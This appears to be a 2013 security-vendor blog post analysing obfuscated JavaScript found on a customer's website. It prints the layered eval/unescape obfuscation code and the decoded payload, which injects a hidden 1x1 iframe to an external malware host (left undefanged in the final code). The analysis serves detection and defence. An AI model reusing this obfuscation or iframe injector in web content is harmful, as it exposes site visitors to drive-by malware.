Friday, May 3, 2013

More than 150 variables and multiple obfuscation levels to generate malicious iframe


154 variables and multiple obfuscation levels used to generate hidden malicious iframe

Background


On 5 May 2013 during scheduled monitoring of the customer website potentially suspicious content was detected on home page.
We decided to create a dedicated post to it since what initially looked like low severity (Potentially Suspicious) threat turned out as carefully crafted malicious code. With over 150 variables used to generate hidden malicious iframe aided with arithmetic operations, eval, unescape and other JavaScript methods to obfuscate and to deliver the attack.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).


Initial threat

The detection by Website Malware Monitoring & alerting service looked like this:
[[ unescape(ZQCtZ.replace(/qz/g,'3').replace(/vFQ%/g,'%')) ]]


When one of Quttera researchers manually investigated this page it appeared to have pretty interesting content. Over 150 variables used to generate hidden malicious iframe to http://triplex.lazyfish[.]cc/forum/Lasna using arithmetic operations and eval, replace and unescape methods.
Here are two JavaScript portions that comprised the threat


  1. <script>
  2. var SNZWz="2vFQ%q";var I7GA3X="vFQ%qz";var ijD85AH5="FQ%6FvFQ";var XDHG="5AvFQ%6Dv";var zNefmg2="2eM702";varDtTu8="2E2eM632eM632e";var UWPDJ3="AvFQ%6DvFQ%54vF";var qhyU="2eM4C2eM";var S1nZ1dzJ=".replace";varqe9PifE1="9%q6E%q43%q73";var ef4g9OD="672eM652eM742eM";var hapxCQo="M6F2eM712";var ocLLHE="place(/%e/g,'%";varQCxMwm="31wK27wK3B";var Wq7P="27vFQ%2BvF";var oiGKWh="M6E2eM432eM732";var VauKkg="%qzB';eval(une";varGePy="j1H69j1H6Cj";var U7wTw7tD="kAx.repl";var d4W6c38="1%q39%q6A%q";var eBaeIu="eM302e";vark959QQ="Q%qzCvFQ%2FvFQ";var nDpQe="FQ%65vFQ%6Ev";ijD85AH5+="%6qzvFQ%7";var ZsDQnL3="69vFQ%66";varMNJt="2E2eM7";var aDPn4E="4wK74wK68wK3ISj";var B7zjLI4="H68j1H69j1H64j1";var TlUlo3="2eM6E2eM742";varPBLDV="vFQ%76vFQ%61vFQ";var Hk6qlEBB="64vFQ%69vFQ%76v";oiGKWh+="eM3O2eM";varGiKE="FQ%/g,'%')))";DtTu8+="M2F2eM662eM6F";var hKVXb=").replace(";QCxMwm+="';eval(unesca";varZxbFWakR="Q%qzDvFQ%qzDv";var O8b9R="6EvFQ%74vFQ%2Ev";var V4MXa="8%q69%q6C%";var Oj7WlN="652eM6E2e";varM8yYr="Q%qzDvFQ%27vFQ%";var lUclTS0O="H43j1H73j1H39j";var TmvWay="43j1H7";d4W6c38+="38%q30%q2E%q61";varYBYr2="eM272eM2O2eM3";aDPn4E="d9GwK77wK69wK6"+aDPn4E;var U6op="2eM6C2eM652eM6n";XDHG="%qz5vFQ%"+XDHG;varqUoHq="%72vFQ%69v";var FpPlJ5Qj="M272eM3B';eva";hKVXb=S1nZ1dzJ+"(/O/g,'9'"+hKVXb;varIsbBw="70vFQ%4";O8b9R+="FQ%62vFQ";var bTRzxxnl="eM7A2e";PBLDV+="%72vFQ%20vFQ%";var XGl0y="722eM6O2";vartfMjw="2eM432eM732e";var yueNLQ="FQ%28vFQ%4Bv";O8b9R+="%6FvFQ%";qe9PifE1+="%q39%q42%q78%q";varytapwxL="5vFQ%27v";var eGJC4hE="/ISj/g,'D')";var oJm0i="')));var kXPK=";varfOjK="12eM6n42eM652";d4W6c38=oJm0i+"'%q50%q6F%q7"+d4W6c38;ytapwxL+="FQ%qzEvFQ%qzCv";ytapwxL=SNZWz+"z7vFQ%6"+ytapwxL;varpbVeoE="6E2eM742eM2E2eM";varZ1HTQz3N="QCtZ.replace(";YBYr2="72eM652"+YBYr2;qUoHq="2EvFQ%77vFQ"+qUoHq;aDPn4E+="wK27wK31wK2";varNbzTZ="7O2eM4O2e";lUclTS0O="H49j1H39j1H6Ej1"+lUclTS0O;TmvWay="1H39j1H6Ej1H"+TmvWay;varmhK4V5="Q%79vFQ";qUoHq+="FQ%74vF";B7zjLI4="j1H3Dj1H27j1"+B7zjLI4;varOAcbJ5="1H27j1H";fOjK+="eM272eM2O2eM3";TlUlo3+="eM282e";var WG0onsku="wK39wK6%d9";var uz4F="M632eM752eM6n42";varCuaMbHhb="6CvFQ%6CvF";var ...
  3. eval(ocLLHE);
  4. </script>
  5. <script>
  6. var cRpFMoZ="586I276I3E6";var wWsP="6I3C6I";var cLvBPy="kn/g,'D').repla";var Ck7rxL8="96I766I3E6";varscNVqCC3="%9T2I9T7";var SvHjm=";var D";var sWkMjo0="%9T7X%9T79%9";var gUYF="/9Cn/g,'B";var gtElz="place(/cV4/";varrgO9M="6I626I6F6I6";var Rh9T87h9="656I6E6I746I2";var olhu82j="B%9T52%9T50%9T";var kEmDB9="9T50%9T42%";varTNoG6="796I3kn6I3k";var UdyK="16I3kn6I226I3";var TPS5C="n6I656I";Rh9T87h9+="E6I776I";var S4KzmDL="T74%9T28%9";varDC1E="7Ys46Ys6F";var F0xaI="6I456I486I636I3";var s8JMD="9T6I9T61%9T27%9";var QoQAX5="%9T65%9";varBSqb4o="ETT='%9T76%9T61";var TgLXmGg="6F6I636I";var y6cwX8="%9T69%9T67%";var JT4rcB="D%9T64%9T6F";varRAyjF="s65Ys6EYs64Ys4";y6cwX8="9T68%9T65"+y6cwX8;var qTeaS="Ys50YscV49Y";cLvBPy=gUYF+"').replace(/"+cLvBPy;varOv7AU="%').rep";var FXXNZi="756I6C6I6";var kQEmjUwg="65%9T6I9T7";var x2GCd=";eval(unescape";varo4Qrl9r1="cV48Ys5cV4Ys";var wknkCaq6="E6I746I2E6I6";var  ...
  7. eval(gtElz);
  8. </script>


During the execution of the script another code portion was generated:

  1. <script>
  2. varZQCtZ='vFQ%76vFQ%61vFQ%72vFQ%20vFQ%4BvFQ%qz5vFQ%5AvFQ%6DvFQ%54vFQ%qzDvFQ%22vFQ%qzCvFQ%64vFQ%69vFQ%76vFQ%20vFQ%69vFQ%64vFQ%qzDvFQ%27vFQ%72vFQ%qz8vFQ%70vFQ%46vFQ%5qzvFQ%62vFQ%qz7vFQ%65vFQ%27vFQ%qzEvFQ%qzCvFQ%2FvFQ%64vFQ%69vFQ%76vFQ%qzEvFQ%22vFQ%qzBvFQ%69vFQ%66vFQ%28vFQ%64vFQ%6FvFQ%6qzvFQ%75vFQ%6DvFQ%65vFQ%6EvFQ%74vFQ%2EvFQ%62vFQ%6FvFQ%64vFQ%79vFQ%qzDvFQ%qzDvFQ%6EvFQ%75vFQ%6CvFQ%6CvFQ%29vFQ%4BvFQ%qz5vFQ%5AvFQ%6DvFQ%54vFQ%qzDvFQ%27vFQ%qzCvFQ%62vFQ%6FvFQ%64vFQ%79vFQ%qzEvFQ%27vFQ%2BvFQ%4BvFQ%qz5vFQ%5AvFQ%6DvFQ%54vFQ%2BvFQ%27vFQ%qzCvFQ%2FvFQ%62vFQ%6FvFQ%64vFQ%79vFQ%qzEvFQ%27vFQ%qzBvFQ%64vFQ%6FvFQ%6qzvFQ%75vFQ%6DvFQ%65vFQ%6EvFQ%74vFQ%2EvFQ%77vFQ%72vFQ%69vFQ%74vFQ%65vFQ%20vFQ%28vFQ%4BvFQ%qz5vFQ%5AvFQ%6DvFQ%54vFQ%29vFQ%qzB';
  3. eval(unescape(ZQCtZ.replace(/qz/g,'3').replace(/vFQ%/g,'%')));
  4. varlnwIHV19='2eM762eM612eM722eM202eM502eM6F2eM712eM3O2eM6A2eM382eM302eM3n42eM642eM6F2eM632eM752eM6n42eM652eM6E2eM742eM2E2eM672eM652eM742eM452eM6C2eM652eM6n42eM652eM6E2eM742eM422eM7O2eM4O2eM642eM282eM272eM722eM382eM702eM462eM532eM622eM372eM652eM272eM2O2eM3B2eM762eM612eM722eM202eM4O2eM3O2eM6E2eM432eM732eM3O2eM422eM782eM3n42eM642eM6F2eM632eM752eM6n42eM652eM6E2eM742eM2E2eM632eM722eM652eM612eM742eM652eM452eM6C2eM652eM6n42eM652eM6E2eM742eM282eM272eM6O2eM662eM722eM612eM6n42eM652eM272eM2O2eM3B2eM4O2eM3O2eM6E2eM432eM732eM3O2eM422eM782eM2E2eM732eM722eM632eM3n42eM272eM682eM742eM742eM702eM3A2eM2F2eM2F2eM742eM722eM6O2eM702eM6C2eM652eM782eM2E2eM6C2eM612eM7A2eM7O2eM662eM6O2eM732eM682eM2E2eM632eM632eM2F2eM662eM6F2eM722eM752eM6n42eM2F2eM4C2eM612eM732eM6E2eM612eM272eM3B';eval(unescape(lnwIHV19.replace(/O/g,'9').replace(/n4/g,'D').replace(/2eM/g,'%')));
  5. varwbbeBrNK='wK49wK39wK6%d9GwK43wK73wK39wK42wK78wK2%d9GwK77wK69wK64wK74wK68wK3ISjwK27wK31wK27wK3BwK49wK39wK6%d9GwK43wK73wK39wK42wK78wK2%d9GwK68wK65wK69wK67wK68wK74wK3ISjwK27wK31wK27wK3B';eval(unescape(wbbeBrNK.replace(/%d9G/g,'E').replace(/ISj/g,'D').replace(/wK/g,'%')));varnkAx='j1H49j1H39j1H6Ej1H43j1H73j1H39j1H42j1H78j1H2Ej1H6Ej1H61j1H6Dj1H65j1H3Dj1H27j1H66j1H33j1H53j1H57j1H33j1H74j1H48j1H77j1H47j1H59j1H27j1H3Bj1H49j1H39j1H6Ej1H43j1H73j1H39j1H42j1H78j1H2Ej1H73j1H74j1H79j1H6Cj1H65j1H2Ej1H76j1H69j1H73j1H69j1H62j1H69j1H6Cj1H69j1H74j1H79j1H3Dj1H27j1H68j1H69j1H64j1H64j1H65j1H6Ej1H27j1H3B';eval(unescape(nkAx.replace(/j1H/g,'%')));varkXPK='%q50%q6F%q71%q39%q6A%q38%q30%q2E%q61%q70%q70%q65%q6E%q64%q43%q68%q69%q6C%q64%q28%q49%q39%q6E%q43%q73%q39%q42%q78%q29%q3B';eval(unescape(kXPK.replace(/%q/g,'%e').replace(/%e/g,'%')));
  6. vargWRzgv0='6I766I616I726I206I656I796I356I756I316I3kn6I226I3C6I646I696I766I206I696I646I3kn6I276I456I486I636I336I686I4C6I656I586I276I3E6I3C6I2F6I646I696I766I3E6I226I39Cn6I696I666I286I646I6F6I636I756I6kn6I656I6E6I746I2E6I626I6F6I646I796I3kn6I3kn6I6E6I756I6C6I6C6I296I656I796I356I756I316I3kn6I276I3C6I626I6F6I646I796I3E6I276I29Cn6I656I796I356I756I316I29Cn6I276I3C6I2F6I626I6F6I646I796I3E6I276I39Cn6I646I6F6I636I756I6kn6I656I6E6I746I2E6I776I726I696I746I656I206I286I656I796I356I756I316I296I39Cn6I766I616I726I206I586I446I466I546I6A6I556I6E6I3kn6I646I6F6I636I756I6kn6I656I6E6I746I2E6I676I656I746I456I6C6I656I6kn6I656I6E6I746I426I796I496I646I286I276I456I486I636I336I686I4C6I656I586I276I296I39Cn';
  7. alert(unescape(gWRzgv0.replace(/9Cn/g,'B').replace(/kn/g,'D').replace(/6I/g,'%')));
  8. varmETT='%9T76%9T61%9T72%9T20%9T52%9T50%9T42%9T6X%9T50%9T50%9T3D%9T64%9T6F%9T63%9T75%9T6D%9T65%9T6I9T74%9T2I9T63%9T72%9T65%9T61%9T74%9T65%9T45%9T6C%9T65%9T6D%9T65%9T6I9T74%9T28%9T27%9T69%9T66%9T72%9T61%9T6D%9T65%9T27%9T29%9T3B%9T52%9T50%9T42%9T6X%9T50%9T50%9T2I9T73%9T72%9T63%9T3D%9T27%9T68%9T74%9T74%9T70%9T3X%9T2F%9T2F%9T74%9T72%9T69%9T70%9T6C%9T65%9T78%9T2I9T6C%9T61%9T7X%9T79%9T66%9T69%9T73%9T68%9T2I9T63%9T63%9T2F%9T66%9T6F%9T72%9T75%9T6D%9T2F%9T4C%9T61%9T73%9T6I9T61%9T27%9T3B%9T52%9T50%9T42%9T6X%9T50%9T50%9T2I9T77%9T69%9T64%9T74%9T68%9T3D%9T27%9T31%9T27%9T3B%9T52%9T50%9T42%9T6X%9T50%9T50%9T2I9T68%9T65%9T69%9T67%9T68%9T74%9T3D%9T27%9T31%9T27%9T3B';
  9. </script>


Malicious payload


Finally all these strings decoded to JavaScript code used to inject hidden iframe to http://triplex.lazyfish[.]cc/forum/Lasna 

The final code is:


  1. var RPBjPP=document.createElement('iframe');
  2. RPBjPP.src='http://triplex.lazyfish.cc/forum/Lasna';
  3. RPBjPP.width='1';
  4. RPBjPP.height='1';



Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.